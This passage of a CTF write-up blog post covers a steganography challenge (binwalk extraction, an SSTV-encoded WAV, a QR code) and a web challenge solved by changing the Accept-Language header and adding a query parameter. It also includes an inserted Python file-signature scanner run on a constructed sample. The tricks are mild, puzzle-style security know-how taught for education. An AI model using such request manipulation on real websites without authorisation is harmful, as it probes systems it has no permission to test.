class=\"wp-block-paragraph\">And with that, we have the full flag! Hurray! We even got second blood on this one \ud83d\ude42<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"space\">Space Ahoy<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">This is a challenge where we are given an image to work with. Running <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">binwalk<\/mark> on it, with -e to extract what it finds and -M to recurse into the extracted files, gives us another image hidden inside the first:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">binwalk -Me file.jpg<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full wp-duotone-unset-12\"><img loading=\"lazy\" decoding=\"async\" width=\"612\" height=\"408\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/hidden-1.jpg\" alt=\"\" class=\"wp-image-764\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/hidden-1.jpg 612w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/hidden-1-300x200.jpg 300w\" sizes=\"auto, (max-width: 612px) 100vw, 612px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We can also find a peculiar string in the first image:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">the aliens are here try slowscan<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Using binwalk on the second image, we find a .wav file:<\/p>\n\n\n\n<div class=\"wp-block-file aligncenter\"><a id=\"wp-block-file--media-c0a40245-1327-449d-9352-9379cb165cee\" href=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/SupEr_s3CrET_AuD10.wav\">SupEr_s3CrET_AuD10<\/a><a href=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/SupEr_s3CrET_AuD10.wav\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c0a40245-1327-449d-9352-9379cb165cee\">Download<\/a><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">This time, binwalk doesn&#8217;t find anything in it. 
Looking up what slowscan is, I found out that it refers to slow-scan television (SSTV), a mode radio amateurs use to transmit still images as audio tones over a voice channel, which is exactly what a .wav can carry. Looking a bit more, I found the <a href=\"https:\/\/github.com\/colaclanth\/sstv\">SSTV<\/a> decoder on GitHub by <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">colaclanth<\/mark>, which turns an SSTV .wav recording back into an image. Using it gave me this image:<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full wp-duotone-unset-13\"><img loading=\"lazy\" decoding=\"async\" width=\"320\" height=\"256\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/sstv_blur.png\" alt=\"\" class=\"wp-image-771\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/sstv_blur.png 320w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/sstv_blur-300x240.png 300w\" sizes=\"auto, (max-width: 320px) 100vw, 320px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Scanning the QR code gave me the flag! 
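<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">binwalk did the heavy lifting twice in this challenge, and a strings search did it for Gibberish. To make explicit what those tools look for, here is a small scanner in Python, added as an example and not taken from the original write-up or from binwalk: it base64-decodes the input when the whole file is base64 text (the Gibberish case), reports known magic signatures with their offsets, carves a RIFF\/WAVE out using the length field in its header, and lists printable strings that match a flag pattern. The sample blob is constructed for the example (a JPEG-like header with the hint string, an embedded minimal WAV and an ELF-like tail with a fake flag); real binwalk knows hundreds of signatures and size rules that this does not.<\/p>

```python
import base64
import re
import struct

# Magic bytes worth recognising in a CTF blob, mapped to a short type name.
SIGNATURES = {
    b'\x7fELF': 'elf',
    b'\xff\xd8\xff': 'jpeg',
    b'\x89PNG\r\n\x1a\n': 'png',
    b'PK\x03\x04': 'zip',
    b'RIFF': 'riff',   # refined to 'wav' below when the form type is WAVE
}

# Flag-shaped text: a short prefix, then braces with something inside.
FLAG_RE = re.compile(r'[A-Za-z0-9_]{2,10}\{[^}]{1,80}\}')


def maybe_base64(data: bytes) -> bytes:
    '''Decode data if the whole file is base64 text (as flag.txt was); otherwise return it unchanged.'''
    stripped = b''.join(data.split())
    if stripped and len(stripped) % 4 == 0 and re.fullmatch(rb'[A-Za-z0-9+/]+={0,2}', stripped):
        try:
            return base64.b64decode(stripped, validate=True)
        except ValueError:
            pass
    return data


def find_signatures(data: bytes) -> list:
    '''(offset, type) for every occurrence of a known signature, ordered by offset.'''
    hits = []
    for magic, kind in SIGNATURES.items():
        i = data.find(magic)
        while i >= 0:
            if kind == 'riff' and data[i + 8:i + 12] == b'WAVE':
                hits.append((i, 'wav'))
            else:
                hits.append((i, kind))
            i = data.find(magic, i + 1)
    return sorted(hits)


def riff_size(data: bytes, offset: int) -> int:
    '''Total size of the RIFF container at offset: 8 header bytes plus the little-endian size field.'''
    return 8 + struct.unpack_from('<I', data, offset + 4)[0]


def carve(data: bytes, offset: int, kind: str) -> bytes:
    '''Cut the embedded file out. RIFF/WAVE carries its own length; for the
    other types this simple version takes everything up to the end of the blob.'''
    if kind in ('wav', 'riff'):
        return data[offset:offset + riff_size(data, offset)]
    return data[offset:]


def strings(data: bytes, min_len: int = 4) -> list:
    '''Printable ASCII runs of at least min_len bytes, like the strings(1) tool.'''
    return [m.group().decode('ascii') for m in re.finditer(rb'[\x20-\x7e]{%d,}' % min_len, data)]


def find_flags(data: bytes) -> list:
    '''Flag-shaped substrings among the printable strings of data.'''
    return [m.group() for s in strings(data) for m in FLAG_RE.finditer(s)]


def build_sample() -> bytes:
    '''Constructed test blob laid out like the challenge file: a JPEG-style header
    carrying the hint string, an embedded minimal WAV, then an ELF-style tail
    with a fake flag. It is not the real challenge data.'''
    fmt_chunk = b'fmt ' + struct.pack('<IHHIIHH', 16, 1, 1, 8000, 16000, 2, 16)
    data_chunk = b'data' + struct.pack('<I', 4) + b'\x00' * 4
    wav_body = b'WAVE' + fmt_chunk + data_chunk
    wav = b'RIFF' + struct.pack('<I', len(wav_body)) + wav_body
    jpeg = (b'\xff\xd8\xff\xe0\x00\x10JFIF\x00' + b'\x00' * 16
            + b'the aliens are here try slowscan' + b'\x00' * 8)
    elf = (b'\x7fELF\x02\x01\x01' + b'\x00' * 9
           + b'goodbye\x01\x02\x03dsc{constructed_example_flag}\x00Wrong pass\x00')
    return jpeg + wav + b'\xff\xd9' + elf


if __name__ == '__main__':
    blob = maybe_base64(build_sample())
    for offset, kind in find_signatures(blob):
        print(hex(offset), kind, len(carve(blob, offset, kind)), 'bytes')
    print(find_flags(blob))
```

<p class=\"wp-block-paragraph\">For the Gibberish file, maybe_base64() followed by find_flags() is the whole solve; for the image it is find_signatures() and carve(). The RIFF length field is what lets the WAV be cut out exactly rather than to the end of the file, which is the difference between a carver and a plain signature grep, and the part that needs per-format knowledge.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">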
One more down!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"nothing\">sweet-nothing<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">For this challenge, we come across this website, which apparently has the flag right in front of us:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-14\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"493\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/nothing-1024x493.png\" alt=\"\" class=\"wp-image-774\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/nothing-1024x493.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/nothing-300x144.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/nothing-768x370.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/nothing-1536x739.png 1536w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/nothing.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">A lot of things about Italy. Playing a bit with the request, we notice the language header the browser sends by default:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">Accept-Language: en-US,en;q=0.5<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">What if we ask for Italian instead? This is what we get back:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">Almost there! Your secret query is \"spaghetti\".<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And, if we add the query parameter <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">query=spaghetti<\/mark> to our request before sending it:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">dsc{REDACTED}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And we got our flag for this challenge!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"conclusion\">Conclusion<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">This CTF had quite a lot of guesswork, but I enjoyed it. 
Here are my final results:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-15\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"557\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/result-1024x557.png\" alt=\"\" class=\"wp-image-790\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/result-1024x557.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/result-300x163.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/result-768x418.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/result-1536x836.png 1536w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/result.png 1588w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">I finished 67th out of 1506 contestants, with 7 challenges completed including one second blood. I&#8217;m quite happy with this result!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hi all, I participated this year in the DeconstruCT.F event, and I thought I would share my results with you. 
Summary Avail Your Good Boy Points When reading the rules all the way to the end, we find the first flag of this challenge : And, that gives us our first 100 points of the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4],"tags":[68,67,66],"class_list":["post-707","post","type-post","status-publish","format-standard","hentry","category-writeups","tag-68","tag-ctf","tag-deconstruct-f"],"featured_image_src":null,"author_info":{"display_name":"BabdCatha","author_link":"https:\/\/babdcatha.net\/index.php\/author\/admin4804\/"},"_links":{"self":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/707","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/comments?post=707"}],"version-history":[{"count":61,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/707\/revisions"}],"predecessor-version":[{"id":860,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/posts\/707\/revisions\/860"}],"wp:attachment":[{"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/media?parent=707"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/categories?post=707"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/babdcatha.net\/index.php\/wp-json\/wp\/v2\/tags?post=707"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}